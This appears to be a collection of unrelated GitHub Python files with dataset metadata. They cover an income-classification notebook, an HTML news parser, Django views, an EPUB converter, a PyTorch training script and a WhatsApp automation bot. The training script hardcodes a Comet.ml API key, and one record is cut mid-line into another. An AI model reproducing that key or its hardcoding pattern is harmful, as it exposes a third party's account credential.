df[column].replace(' ?', np.NaN, inplace=True)\ndf = df.dropna().reset_index().drop(columns=['index'])\nshape1 = df.shape[0]\nprint(str(shape0 - shape1) + ' rows have been removed.')\n\n\n# In[18]:\n\n\nincome = df.income.value_counts()\nincome\n\n\n# In[19]:\n\n\ncolors = ['#ADEFD1FF', '#00203FFF']\nexplode = [0, 0.1]\nplt.pie(income, labels=income.values, colors=colors, explode = explode, shadow=True)\nplt.title('Income distribution')\nplt.legend(labels=income.index)\n\n\n# In[20]:\n\n\ndf['income'].replace([' <=50K',' >50K'],[1,0], inplace=True)\n\n\n# In[21]:\n\n\ndf.dtypes\n\n\n# In[22]:\n\n\nstats = df.select_dtypes(['float', 'int64']).drop(columns=['income'])\n\n\n# In[23]:\n\n\nsns.heatmap(df.corr(), annot=True).set_title('Correlation Factors Heat Map', color='black', size='20')\n\n\n# In[24]:\n\n\ndf_final = pd.get_dummies(df)\ndf_final.head()\n\n\n# In[25]:\n\n\nX = df_final.drop(columns=['income'])\ny = df_final['income']\n\n\n# In[26]:\n\n\nss = StandardScaler()\nss.fit(X)\nX = ss.transform(X)\nX_train, X_test, y_train, y_test = train_test_split(X, y, test_size=0.3)\n\n\n# In[27]:\n\n\nct = dtree(\n criterion=\"entropy\", # Alternative 'entropy'\n max_depth=None # Alternative, specify an integer\n # 'None' means full tree till single leaf\n )\n\n\n# In[28]:\n\n\n_=ct.fit(X_train,y_train)\n\n\n# In[29]:\n\n\ny_te = ct.predict(X_test)\nnp.sum((y_test == y_te))/y_test.size\n\n\n# In[30]:\n\n\nfi = ct.feature_importances_\nfi\n\n\n# In[31]:\n\n\nlist(zip(df.columns, fi))\n\n\n# In[32]:\n\n\nfrom sklearn.ensemble import RandomForestClassifier \n\n\n# In[33]:\n\n\nclf=RandomForestClassifier(n_estimators=100)\n\n\n# In[34]:\n\n\nclf.fit(X_train,y_train)\n\ny_pred=clf.predict(X_test)\n\n\n# In[35]:\n\n\nfrom sklearn import metrics\nprint(\"Accuracy:\",metrics.accuracy_score(y_test, y_pred))\n\n\n# In[ ]:\n\n\n\n\n","repo_name":"AkshayVashistha/MLP","sub_path":"income evaluation .py","file_name":"income evaluation .py","file_ext":"py","file_size_in_byte":2651,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"9237791636","text":"class Solution:\n def minOperations(self, nums: List[int]) -> int:\n n=len(nums)\n ans=n\n nums=sorted(set(nums))\n r=0\n for l in range(len(nums)):\n while r(.*?)',\n self.html)\n refs = re.findall(r'(.*?)',\n self.html, re.DOTALL)\n return titles, description, refs\n\n def get_time(self):\n \"\"\"\n :return: время статей\n \"\"\"\n time = self.data.find_all('span', {'class': \"item__info\"})\n return time\n\n def get_paragraphs(self):\n '''\n :return: текст статьи\n '''\n paragraphs = self.data.find_all('p')\n text = ''\n for i in paragraphs:\n text += i.text\n return text\n\n def get_tags(self):\n \"\"\"\n :return: теги\n \"\"\"\n tags = self.data.find_all('a', {'class': \"article__tags__link\"})\n return tags\n","repo_name":"corwinnn/myBot","sub_path":"myParser.py","file_name":"myParser.py","file_ext":"py","file_size_in_byte":1497,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"36030006058","text":"from django.shortcuts import render\nfrom django.http import HttpResponse\nfrom newsApp.models import news\n\ndef table(request):\n title = request.GET['title']\n sdate = request.GET['sdate']\n tdate = request.GET['tdate']\n preType = request.GET.getlist('type')\n order = int(request.GET['order'])\n type = [int(x) for x in preType]\n info = news.objects.filter(title__icontains=title, type__in=type, date__gte=sdate, date__lte=tdate)\n\n if order == 0:\n info = info.order_by('-date')\n else:\n info = info.order_by('date')\n\n return render(request, 'table.html', {'data': info})\n\ndef tableAll(request):\n info=news.objects.all()\n return render(request,'table.html',{'data':info})\n\ndef index(request):\n return render(request, 'index.html')","repo_name":"12mango/2019_backstage_group_assessment_archive","sub_path":"3/newsPlatform/newsApp/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":776,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"37078387708","text":"def add(a,b):\n ans = a+b\n return(ans)\n\ndef sub(a,b):\n ans = a-b\n return(ans)\n \ndef mult(a,b):\n ans = a*b\n return(ans)\n \ndef div(a,b):\n ans = a/b\n return(ans)\n \ndef sqr(a):\n ans = a*a\n return(ans)\n \ndef rem(a,b):\n return (a%b)\n \ndef power(a,b):\n return (a**b)\n \ndef bid1(a):\n a = a*3\n a = a+4\n return (a)\n \ndef bid2(a):\n a = a+4\n a = a*3\n return (a)\n \nc = 7\nd = 5 \nprint(\"addition test\")\nprint(add(c,d))\nprint(\"subtraction test\")\nprint(sub(c,d))\nprint(\"Multiplication test\")\nprint(mult(c,d))\nprint(\"Square test\")\nprint(sqr(c))\nprint(\"Remainder test\")\nprint(rem(c,d))\nprint(\"Power test\")\nprint(power(c,d))\nprint(\"Bidmas test\")\nprint(bid1(c))\nprint(\"Bidmas test 2\")\nprint(bid2(c))\n\n\n \n","repo_name":"ams-bjones/arithmetic-model","sub_path":"arithmetic.py","file_name":"arithmetic.py","file_ext":"py","file_size_in_byte":762,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"35"} +{"seq_id":"9331333699","text":"\"\"\"\nMain file for training and testing models on the image classification task.\n\"\"\"\n\nfrom __future__ import print_function\nimport comet_ml\nfrom comet_ml import Experiment\nimport argparse\nimport torch\n# import torch.nn as nn\nimport torch.nn.functional as F\nimport torch.optim as optim\nfrom torchvision import datasets, transforms\nimport os\nimport csv\nfrom pathlib import Path\nimport random\nimport numpy as np\nimport models\nfrom sklearn.externals import joblib\nfrom utils.ImageFolderWithPaths import ImageFolderWithPaths\n\ndef create_folder(newpath):\n \"\"\"\n Creates a folder in the file system at the specified path.\n \"\"\"\n if not os.path.exists(newpath):\n os.makedirs(newpath)\n print(\"created directory: \" + str(newpath))\n\ndef configure_arguments():\n \"\"\"\n Configures command line arguments for running this code file.\n \"\"\"\n parser = argparse.ArgumentParser(description='PyTorch Cat/Dog classification project')\n parser.add_argument('--batch_size', type=int, default=64, metavar='N',\n help='input batch size for training (default: 64)')\n parser.add_argument('--test-batch-size', type=int, default=1000, metavar='N',\n help='input batch size for testing (default: 1000)')\n parser.add_argument('--epochs', type=int, default=10, metavar='N',\n help='number of epochs to train (default: 10)')\n parser.add_argument('--lr', type=float, default=0.01, metavar='LR',\n help='learning rate (default: 0.01)')\n parser.add_argument('--no-cuda', action='store_true', default=False,\n help='disables CUDA training')\n parser.add_argument('--seed', type=int, default=1, metavar='S',\n help='random seed (default: 1)')\n parser.add_argument('--log-interval', type=int, default=10, metavar='N',\n help='how many batches to wait before logging training status')\n parser.add_argument('--saved-model-path', type=str, default=None,\n help='path of a saved model to load')\n parser.add_argument('--data_dir', type=str, default=None,\n help='root directory where datasets are stored.')\n parser.add_argument('--mode', type=str, default='train',\n choices=('train', 'test'))\n parser.add_argument('--model', type=str, default='BaseConvNet',\n choices=('BaseConvNet', 'ResNet', 'BaseConvNet2',\n 'BaseConvNet3', 'BaseConvNet4', 'ResNet1'),\n help='the model architecture to use during training')\n parser.add_argument('--aug-min-crop', type=float, default=0.08,\n help='the minimum crop scale fraction')\n\n args = parser.parse_args()\n return args\n\ndef create_dataloaders(args):\n \"\"\"\n Create pytorch data loaders for training, validation and test sets.\n Note that data must already be arranged in 2 sub-folders: 'trainset' and 'valset'.\n \"\"\"\n\n # Data loading code\n traindir = os.path.join(args.data_dir, 'trainset')\n valdir = os.path.join(args.data_dir, 'valset')\n testdir = os.path.join(args.data_dir, 'testset')\n normalize = transforms.Normalize(mean=[0.490, 0.455, 0.416],\n std=[0.252, 0.245, 0.247])\n\n train_dataset = datasets.ImageFolder(\n traindir,\n transforms.Compose([\n transforms.RandomResizedCrop(64, scale=(args.aug_min_crop,1.0)),\n transforms.RandomHorizontalFlip(),\n transforms.ToTensor(),\n normalize,\n ]))\n train_sampler = None\n\n train_loader = torch.utils.data.DataLoader(\n train_dataset, batch_size=args.batch_size,\n shuffle=(train_sampler is None), sampler=train_sampler,\n num_workers=6)\n\n val_loader = torch.utils.data.DataLoader(\n ImageFolderWithPaths(valdir, transforms.Compose([\n #transforms.Resize(80),\n # transforms.CenterCrop(64),\n transforms.ToTensor(),\n normalize,\n ])),\n batch_size=args.test_batch_size, shuffle=False, num_workers=6)\n test_loader = torch.utils.data.DataLoader(\n ImageFolderWithPaths(testdir, transforms.Compose([\n #transforms.Resize(80),\n # transforms.CenterCrop(64),\n transforms.ToTensor(),\n normalize,\n ])),\n batch_size=args.test_batch_size, shuffle=False)\n\n return train_loader, val_loader, test_loader\n\ndef get_learning_rate(optimizer):\n for param_group in optimizer.param_groups:\n return param_group['lr']\n\ndef train(args, model, device, train_val_loaders, optimizer, experiment):\n train_loader, val_loader = train_val_loaders\n max_val_acc = 0\n val_acc = 0\n\n # load saved model, if any.\n if args.saved_model_path:\n model.load(args.saved_model_path)\n\n # set up learning rate scheduler\n # scheduler = optim.lr_scheduler.ReduceLROnPlateau(optimizer,\n # mode='max', verbose=True, patience=10)\n # scheduler = optim.lr_scheduler.StepLR(optimizer, step_size=50, gamma=0.1)\n\n # train for all epochs\n cur_step = 0\n train_logs = []\n valid_logs = []\n for epoch in range(1, args.epochs + 1):\n # log current epoch number on comet\n experiment.log_current_epoch(epoch)\n\n correct = 0\n total = 0\n # train for all minibatches\n # scheduler.step(val_acc)\n # scheduler.step()\n for batch_idx, (data, target) in enumerate(train_loader):\n cur_step += 1\n\n model.train()\n data, target = data.to(device), target.to(device)\n optimizer.zero_grad()\n output = model(data)\n #loss = F.nll_loss(output, target)\n loss = F.cross_entropy(output, target)\n loss.backward()\n optimizer.step()\n\n # compute train accuracy\n _, predicted = torch.max(output.data, 1)\n total += target.size(0)\n correct += (predicted == target.data).sum()\n acc = 100. * correct / total\n\n # log to comet.ml\n experiment.log_metric(\"learning_rate\",\n get_learning_rate(optimizer), step=cur_step)\n experiment.log_metric(\"train_loss\", loss.item(), step=cur_step)\n experiment.log_metric(\"train_accuracy\", acc.item(), step=cur_step)\n train_logs.append((cur_step, acc.item(), loss.item()))\n\n if batch_idx % args.log_interval == 0:\n print('Train Epoch: {} of {} [{}/{} ({:.0f}%)]\\tLoss: {:.6f}\\tAccuracy: {:.6f}'.format(\n epoch, args.epochs, batch_idx * len(data), len(train_loader.dataset),\n 100. * batch_idx / len(train_loader), loss.item(), acc.item()))\n\n # evaluate on valid set and always keep copy of best model.\n model.eval()\n val_loss = 0\n val_correct = 0\n with torch.no_grad():\n for data, target, paths in val_loader:\n data, target = data.to(device), target.to(device)\n output = model(data)\n val_loss += F.nll_loss(output, target, reduction='sum').item() # sum up batch loss\n pred = output.argmax(dim=1, keepdim=True) # get the index of the max log-probability\n val_correct += pred.eq(target.view_as(pred)).sum().item()\n\n val_loss /= len(val_loader.dataset)\n val_acc = 100. * val_correct / len(val_loader.dataset)\n\n experiment.log_metric(\"validation_loss\", val_loss, step=cur_step)\n experiment.log_metric(\"validation_accuracy\", val_acc, step=cur_step)\n valid_logs.append((cur_step, val_acc, val_loss))\n\n print('\\tValidation set: loss: {:.4f}, Accuracy: {}/{} ({:.0f}%)'.format(\n val_loss, val_correct, len(val_loader.dataset), val_acc))\n\n # save best model\n if val_acc > max_val_acc:\n print(\"\\tsaving best model...\")\n max_val_acc = val_acc\n model_path = \"output/\" + args.model + \"/saved_model.pt\"\n model.save(model_path)\n experiment.log_asset(model_path, overwrite=True)\n log_file_path = 'output/' + args.model + '/' + experiment.get_key() + '/logs.pkl'\n joblib.dump((train_logs, valid_logs), log_file_path)\n print('Training logs were written to: ', log_file_path)\n\n return max_val_acc\n\ndef test(args, model, device, test_loader):\n\n # load saved model, if any.\n if args.saved_model_path:\n print('Loading saved model...')\n model.load(args.saved_model_path)\n else:\n raise('No saved model was specified in test mode.')\n\n model.eval()\n # test_loss = 0\n # test_correct = 0\n predictions = []\n # targets = []\n img_names = [] # get names of each image without full path or extension. (we need names to order result)\n\n with torch.no_grad():\n for batch_idx, (data, target, paths) in enumerate(test_loader):\n data, target = data.to(device), target.to(device)\n output = model(data)\n pred = output.argmax(dim=1, keepdim=True) # get the index of the max log-probability\n predictions.append(pred)\n img_names += [Path(path).name.split('.')[0] for path in paths]\n # targets.append(target)\n # test_loss += F.nll_loss(output, target, reduction='sum').item() # sum up batch loss\n # test_correct += pred.eq(target.view_as(pred)).sum().item()\n\n # I commented it out since we don't have test set targets with which to compute performance metrics.\n # test_loss /= len(test_loader.dataset)\n # test_acc = 100. * test_correct / len(test_loader.dataset)\n # print('\\nTest set: Average loss: {:.4f}, Accuracy: {}/{} ({:.0f}%)\\n'.format(\n # test_loss, test_correct, len(test_loader.dataset), test_acc))\n\n # save predictions\n predictions = torch.cat(predictions, 0)\n save_predictions(args, img_names, predictions)\n\ndef save_predictions(args, img_names, predictions):\n print('Saving predictions...')\n preds_path = \"output/\" + args.model + \"/predictions.csv\"\n\n img_names = np.array(img_names)\n predictions = predictions.cpu().numpy().flatten()\n result = dict(zip(img_names, predictions)) # combine image name and prediction into a dictionary.\n class_dict = {0: 'Cat', 1: 'Dog'}\n\n with open(preds_path, 'w', newline='\\n') as csvfile:\n csvwriter = csv.writer(csvfile, delimiter=',')\n csvwriter.writerow(['id', 'label'])\n\n for i in range(len(img_names)):\n id = str(i+1)\n label = result[id]\n csvwriter.writerow([id, class_dict[label]])\n\ndef tune_hyperparams():\n api_key = \"w7QuiECYXbNiOozveTpjc9uPg\"\n optimizer = comet_ml.Optimizer(api_key)\n\n # hyperparameters in PCS format\n params = \"\"\"\n x integer [1, 10] [10]\n \"\"\"\n optimizer.set_params(params)\n\n while True:\n suggestion = optimizer.get_suggestion()\n experiment = Experiment(api_key, project_name=\"project1-ac2g\",\n workspace=\"ift6135\")\n score = train(suggestion[\"x\"])\n suggestion.report_score(\"accuracy\", score)\n\ndef main():\n # Training settings\n args = configure_arguments()\n\n use_cuda = not args.no_cuda and torch.cuda.is_available()\n\n # sets seeds to prevent any unwanted randomness.\n torch.manual_seed(args.seed)\n if use_cuda:\n torch.cuda.manual_seed(args.seed)\n random.seed(args.seed)\n torch.backends.cudnn.deterministic = True\n\n device = torch.device(\"cuda:1\" if use_cuda else \"cpu\")\n\n train_loader, val_loader, test_loader = create_dataloaders(args)\n\n # get instance of model.\n print('Loading the {0} model...'.format(args.model))\n model_class = models.find_model(args.model)\n model = model_class().to(device)\n optimizer = optim.SGD(model.parameters(), lr=args.lr)\n\n no_of_params = sum(p.numel() for p in model.parameters() if p.requires_grad)\n print('Model has {0} parameters'.format(no_of_params))\n\n if args.mode == 'train':\n print('Running in train mode...')\n\n #set up logging.\n experiment = Experiment(api_key=\"w7QuiECYXbNiOozveTpjc9uPg\", project_name=\"project1-ac2g\", workspace=\"ift6135\")\n create_folder('output/' + args.model + '/' + experiment.get_key())\n hyper_params = vars(args)\n experiment.log_parameters(hyper_params)\n\n train(args, model, device, (train_loader, val_loader), optimizer, experiment)\n elif args.mode == 'test':\n print('Running in test mode...')\n test(args, model, device, test_loader)\n\nif __name__ == '__main__':\n main()\n","repo_name":"onucharles/project1-ac2g","sub_path":"problem3/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":12825,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"32105325532","text":"import numpy as np\nimport pandas as pd\nimport matplotlib\nimport matplotlib.pyplot as plt\nfrom matplotlib import cm\nfrom mpl_toolkits import mplot3d\nimport json\nimport os\n\nfrom cri import transforms\nimport pybullet as p\nimport glob\n\nfrom robopush.utils import Namespace\n\n# data_dir = 'red_cube_straight'\n# data_dir = 'red_cube_curve'\n# data_dir = 'red_cube_sin'\n\n# data_dir = 'cylinder_straight'\n# data_dir = 'cylinder_curve'\n# data_dir = 'cylinder_sin'\n\n# data_dir = 'triangle_straight'\n# data_dir = 'triangle_curve'\ndata_dir = 'triangle_sin'\n\ntraj_files = glob.glob(\n os.path.join(\n os.path.dirname(__file__),\n 'collected_data',\n data_dir+\"/*.npy\"\n )\n )\n\nnum_traj = int(len(traj_files)/2)\n\n# setup figure\nfig, ax = plt.subplots()\n\ndef basepos_to_workpos(pos):\n \"\"\"\n Transforms a vector in world frame to a vector in work frame.\n \"\"\"\n work_frame = np.array([-200.0, -420.0, 55, -180, 0, 0])\n transformation_matrix = transforms.euler2mat(work_frame, axes='rxyz')\n inv_transformation_matrix = np.linalg.inv(transformation_matrix)\n\n pos_mat = transforms.euler2mat([*pos,0,0,0])\n\n workframe_pos_mat = np.dot(inv_transformation_matrix, pos_mat)\n workframe_pos = transforms.mat2euler(workframe_pos_mat)\n\n # workframe_pos = pos + [350, -520, 0]\n # workframe_pos = pos + [0, 0, 0]\n\n # workframe_pos += np.array([20, 0, 0, 0, 0, 0])\n\n return np.array(workframe_pos)\n\ndef get_tip_direction_workframe(current_tip_pose):\n \"\"\"\n Warning, deadline research code (specific to current workframe)\n \"\"\"\n # angle for perp and par vectors\n par_ang = -( current_tip_pose[5] ) * np.pi/180\n perp_ang = -( current_tip_pose[5] - 90 ) * np.pi/180\n\n # create vectors (directly in workframe) pointing in perp and par directions of current sensor\n workframe_par_tip_direction = np.array([np.cos(par_ang), np.sin(par_ang), 0]) # vec pointing outwards from tip\n workframe_perp_tip_direction = np.array([np.cos(perp_ang), np.sin(perp_ang),0]) # vec pointing perp to tip\n\n return workframe_par_tip_direction, workframe_perp_tip_direction\n\n# plot target trajectory\ndef plot_traj():\n for i in range(num_traj):\n traj_pos = np.load(os.path.join('collected_data', data_dir, 'traj_pos_{}.npy'.format(i))) * 1000\n traj_rpy = np.load(os.path.join('collected_data', data_dir, 'traj_rpy_{}.npy'.format(i))) * 180 / np.pi\n\n for pos, rpy in zip(traj_pos, traj_rpy):\n pose = np.concatenate([pos, rpy], axis=0)\n par_dir, perp_dir = get_tip_direction_workframe(pose)\n\n goal_x, goal_y = pos[0], pos[1]\n par_x, perp_x = par_dir[0], perp_dir[0]\n par_y, perp_y = par_dir[1], perp_dir[1]\n\n ax.scatter(goal_x, goal_y, color='b', marker='.', alpha=1.0)\n\n ax.quiver(goal_x, goal_y,\n par_x, par_y,\n color='g', alpha=1.0, scale=25.0, angles='uv',\n width=0.0025, headwidth=2.5, headlength=5.0)\n\n ax.quiver(goal_x, goal_y,\n perp_x, perp_y,\n color='r', alpha=1.0, scale=25.0, angles='uv',\n width=0.0025, headwidth=2.5, headlength=5.0)\n\ndef plot_realsense_data():\n\n rs_save_file = os.path.join(\n 'collected_data',\n data_dir,\n 'rs_data',\n 'rs_data.pkl'\n )\n\n rs_data = Namespace()\n rs_data.load(rs_save_file)\n\n # convert centroids to workframe\n trans_centroids = np.array([basepos_to_workpos(pos) for pos in rs_data.base_centroids])\n\n # Plot and save ArUco marker centroid trajectory\n ax.scatter(\n trans_centroids[:, 0],\n trans_centroids[:, 1],\n marker='.',\n color='r',\n alpha=0.15\n )\n\n # ax.scatter(rs_data.base_poses[:, 0, 3], rs_data.base_poses[:, 1, 3], marker='.')\n\n\n\nplot_traj()\nplot_realsense_data()\n\n# format plot\n\n# ax.set_xlim(np.min(px), np.max(px))\n# ax.set_ylim(np.min(py), np.max(py))\n\nax.invert_yaxis()\nax.axis('equal')\n\n# fig.savefig(\n# os.path.join(\n# 'collected_data',\n# data_dir,\n# 'traj_scatter.png'\n# ),\n# dpi=320,\n# pad_inches=0.01,\n# bbox_inches='tight'\n# )\n\nplt.show()\n","repo_name":"yijionglin/tactile_gym_sim2real","sub_path":"tactile_gym_sim2real/online_experiments/object_push_env/plot_push_data.py","file_name":"plot_push_data.py","file_ext":"py","file_size_in_byte":4210,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"35"} +{"seq_id":"5562372004","text":"def filter_custom(l, f):\n '''filter a list using a function\n return a new list that contains all the elements of e of l for which f(e) is True\n :param l: a list\n :param f: a function that takes on one argument and returns either True or False'''\n\n\n return [e for e in l if f(e)]\n\n\ndef map_custom(l ,f):\n\n '''map a list using a function\n return a new list that applies f(e) for every element in l\n\n :param l: a list\n :param f: a function that takes on one argument and returns a value'''\n\n new_list = []\n for e in l:\n new_list.append(f(e))\n return new_list\n\ndef reduce_custom(l, x, starting_value):\n '''reduce a list using a reducer function and a starting value\n return a single value that applies f(v, e) for every e in l from left to right. the initial value for v should be starting_value, and subsequent values should be the previously calculated value from f(v, e)\n\n:param l: a list\nparam f: a function that takes one argument and returns a value :para starting_value: the begginning value for the reducer function computation'''\n\n left_argument = starting_value\n for right_argument in l:\n left_argument = f(left_argument, right_argument)\n return left_argument\n\n\n\n\nif __name__ == '__main__':\n l = [7,8,9]\n f = lambda x: x * 10\n print(map_custom(l, f))\n\nprint(filter_custom(l, f))\nprint(new_list_filt(l, f))\nprint(reduce_custom([1,2,3,17], f, 0))\n\n\n\n","repo_name":"DPF0190/npd_c2_a7","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1429,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"28457112645","text":"from openpyxl import Workbook\nfrom openpyxl import load_workbook\nfrom openpyxl.utils.dataframe import dataframe_to_rows\nimport pandas as pd\nimport re\nfrom unidecode import unidecode\nimport datetime\n\nclass fetchUtils():\n def __init__(self, contrib_db):\n self.contrib_db = contrib_db # \"contribs_boolean.xlsx\"\n xl = pd.ExcelFile(self.contrib_db)\n self.contrib_df = xl.parse('Contributors')\n self.contrib_df['lookup'] = self.contrib_df.apply(lambda x: self.get_name_lookup(x['given_name'], x['surname']), axis=1)\n self.contrib_wb = load_workbook(self.contrib_db)\n self.contrib_ws = self.contrib_wb.get_sheet_by_name(\"Contributors\")\n\n def get_name_lookup(self, given_name, family_name):\n str = \"{}{}\".format(given_name, family_name).lower().replace(\" \", \"\")\n str = re.sub(r'[^\\w\\s]', '', str)\n str = unidecode(str).strip()\n return str\n\n def get_name_parts(self, contrib):\n return contrib.split(\" \", 1)\n\n def get_contibs(self, contribs, affiliation = \"\"):\n contrib_keys = []\n\n if len(contribs) == 0:\n return \"\"\n\n for contrib in contribs:\n if contrib in [\"Foreword\", \"Vorwort\"]:\n contrib = \"Manfred Schewe\"\n contrib = \" \".join(contrib.split()).strip()\n name_parts = self.get_name_parts(contrib)\n if len(name_parts) < 2:\n continue\n else:\n given_name = name_parts[0]\n family_name = name_parts[1]\n lookup = self.get_name_lookup(given_name, family_name)\n matches_df = self.contrib_df[self.contrib_df['lookup'].eq(lookup)]\n if len(matches_df) > 0: \n contrib_keys.append(matches_df.iloc[0]['id'])\n else:\n df_row = {\n 'id': lookup,\n 'given_name': given_name,\n 'surname': family_name,\n 'orcid': '',\n 'primary_affiliation': affiliation,\n 'secondary_affiliation': '',\n 'email_for_ucc_authors': '',\n 'lookup': lookup\n } \n self.contrib_df = self.contrib_df.append(df_row, ignore_index=True)\n self.contrib_ws.append([lookup, given_name,family_name, '', affiliation, '', ''])\n contrib_keys.append(lookup)\n\n contribs = '||'.join(contrib_keys)\n return contribs\n\n def save_wb(self):\n self.contrib_wb.save(self.contrib_db)\n\n def get_full_date(self, date, issue_no=''):\n if len(date) == 4:\n if issue_no == '01':\n mnt = '01'\n elif issue_no == '02':\n mnt = '07'\n else:\n mnt = '01'\n #return \"{}-{}-01\".format(date, mnt)\n return datetime.datetime(int(date), int(mnt), 1).date()\n elif len(date) == 7:\n #return \"{}-{}-01\".format(date[0:4], date[5:7])\n return datetime.datetime(int(date[0:4]), int(date[5:7]), 1).date()\n else:\n return date","repo_name":"eocarragain/xMeta","sub_path":"fetchutils.py","file_name":"fetchutils.py","file_ext":"py","file_size_in_byte":3111,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"39663340609","text":"#!/usr/bin/python\n# -*- coding: utf-8 -*-\n\nimport os\nimport sys\nimport urllib\ntry:\n from urllib import unquote\nexcept:\n from urllib.parse import unquote\nimport zipfile\n\nimport xml.parsers.expat\nimport html2text\nfrom glob import glob\n\n\nclass ContainerParser():\n def __init__(self, xmlcontent=None):\n self.rootfile = \"\"\n self.xml = xmlcontent\n\n def startElement(self, name, attributes):\n if name == \"rootfile\":\n self.buffer = \"\"\n self.rootfile = attributes[\"full-path\"]\n\n def parseContainer(self):\n parser = xml.parsers.expat.ParserCreate()\n parser.StartElementHandler = self.startElement\n parser.Parse(self.xml, 1)\n return self.rootfile\n\n\nclass BookParser():\n def __init__(self, xmlcontent=None):\n self.xml = xmlcontent\n self.title = \"\"\n self.author = \"\"\n self.inTitle = 0\n self.inAuthor = 0\n self.ncx = \"\"\n\n def startElement(self, name, attributes):\n if name == \"dc:title\":\n self.buffer = \"\"\n self.inTitle = 1\n elif name == \"dc:creator\":\n self.buffer = \"\"\n self.inAuthor = 1\n elif name == \"item\":\n if attributes[\"id\"] == \"ncx\" or attributes[\"id\"] == \"toc\" or attributes[\"id\"] == \"ncxtoc\":\n self.ncx = attributes[\"href\"]\n\n def characters(self, data):\n if self.inTitle:\n self.buffer += data\n elif self.inAuthor:\n self.buffer += data\n\n def endElement(self, name):\n if name == \"dc:title\":\n self.inTitle = 0\n self.title = self.buffer\n self.buffer = \"\"\n elif name == \"dc:creator\":\n self.inAuthor = 0\n self.author = self.buffer\n self.buffer = \"\"\n\n def parseBook(self):\n parser = xml.parsers.expat.ParserCreate()\n parser.StartElementHandler = self.startElement\n parser.EndElementHandler = self.endElement\n parser.CharacterDataHandler = self.characters\n parser.Parse(self.xml, 1)\n return self.title, self.author, self.ncx\n\n\nclass NavPoint():\n def __init__(self, id=None, playorder=None, level=0, content=None, text=None):\n self.id = id\n self.content = content\n self.playorder = playorder\n self.level = level\n self.text = text\n\n\nclass TocParser():\n def __init__(self, xmlcontent=None):\n self.xml = xmlcontent\n self.currentNP = None\n self.stack = []\n self.inText = 0\n self.toc = []\n\n def startElement(self, name, attributes):\n if name == \"navPoint\":\n level = len(self.stack)\n self.currentNP = NavPoint(\n attributes[\"id\"], attributes[\"playOrder\"], level)\n self.stack.append(self.currentNP)\n self.toc.append(self.currentNP)\n elif name == \"content\":\n self.currentNP.content = unquote(attributes[\"src\"])\n elif name == \"text\":\n self.buffer = \"\"\n self.inText = 1\n\n def characters(self, data):\n if self.inText:\n self.buffer += data\n\n def endElement(self, name):\n if name == \"navPoint\":\n self.currentNP = self.stack.pop()\n elif name == \"text\":\n if self.inText and self.currentNP:\n self.currentNP.text = self.buffer\n self.inText = 0\n\n def parseToc(self):\n parser = xml.parsers.expat.ParserCreate()\n parser.StartElementHandler = self.startElement\n parser.EndElementHandler = self.endElement\n parser.CharacterDataHandler = self.characters\n parser.Parse(self.xml, 1)\n return self.toc\n\n\nclass epub2txt():\n def __init__(self, epubfile=None):\n self.epub = epubfile\n\n def convert(self):\n # print \"Processing %s ...\" % self.epub\n file = zipfile.ZipFile(self.epub, \"r\")\n rootfile = ContainerParser(\n file.read(\"META-INF/container.xml\")).parseContainer()\n title, author, ncx = BookParser(file.read(rootfile)).parseBook()\n ops = \"/\".join(rootfile.split(\"/\")[:-1])\n if ops != \"\":\n ops = ops+\"/\"\n toc = TocParser(file.read(ops + ncx)).parseToc()\n\n # fo = open(\"%s_%s.txt\" % (title, author), \"w\")\n content = []\n for t in toc:\n # this could be improved. see https://github.com/soskek/bookcorpus/issues/26\n html = file.read(ops + t.content.split(\"#\")[0])\n text = html2text.html2text(html.decode(\"utf-8\"))\n # fo.write(\"*\"*(t.level+1) + \" \" + t.text.encode(\"utf-8\")+\"\\n\")\n # fo.write(t.text.encode(\"utf-8\")+\"{{{%d\\n\" % (t.level+1))\n # fo.write(text.encode(\"utf-8\")+\"\\n\")\n content.append(\"*\" * (t.level+1) + \" \" +\n t.text + \"\\n\")\n content.append(t.text + \"{{{%d\\n\" % (t.level+1))\n content.append(text + \"\\n\")\n\n # fo.close()\n file.close()\n return ''.join(content)\n\n\nif __name__ == \"__main__\":\n if sys.argv[1]:\n filenames = glob(sys.argv[1])\n for filename in filenames:\n txt = epub2txt(filename).convert()\n print(txt)\n","repo_name":"soskek/bookcorpus","sub_path":"epub2txt.py","file_name":"epub2txt.py","file_ext":"py","file_size_in_byte":5182,"program_lang":"python","lang":"en","doc_type":"code","stars":735,"dataset":"github-code","pt":"35"} +{"seq_id":"20242874913","text":"import pyautogui as pt\nfrom time import sleep\nimport pyperclip\nimport random\n\nsleep(5)\n\n\ndef copy_message_routine():\n global x, y\n\n pt.moveTo(x, y, duration=.05)\n pt.moveTo(x + 40, y - 40, duration=.5)\n pt.tripleClick()\n pt.rightClick()\n pt.moveRel(12, 15)\n pt.click()\n\n\ndef paste_message_routine(message):\n global x, y\n\n pt.moveTo(x + 30, y + 20, duration=.5)\n pt.click()\n\n pt.typewrite(message)\n\n pt.typewrite('\\n')\n\n\ndef open_chat_routine():\n global x, y\n\n pt.moveTo(x, y)\n pt.moveRel(-100, 0)\n pt.click()\n\n\ndef press_send_button_routine():\n global x, y\n\n get_position('wpp_project\\img\\send_button.png')\n\n pt.moveTo(x + 20, y + 20, duration=.5)\n\n pt.click()\n\n\ndef get_position(path):\n global x, y\n\n position1 = pt.locateOnScreen(path, confidence=.6)\n\n if position1:\n x = position1[0]\n y = position1[1]\n\n return True\n\n else:\n return False\n\n\ndef get_message():\n global x, y\n\n get_position('wpp_project\\img\\smile_paperclip.png')\n\n copy_message_routine()\n\n wpp_message = pyperclip.paste()\n pt.click()\n print('message received: ' + wpp_message)\n\n return wpp_message\n\n\ndef post_response(message):\n global x, y\n\n get_position('wpp_project\\img\\\\text_box.png')\n\n 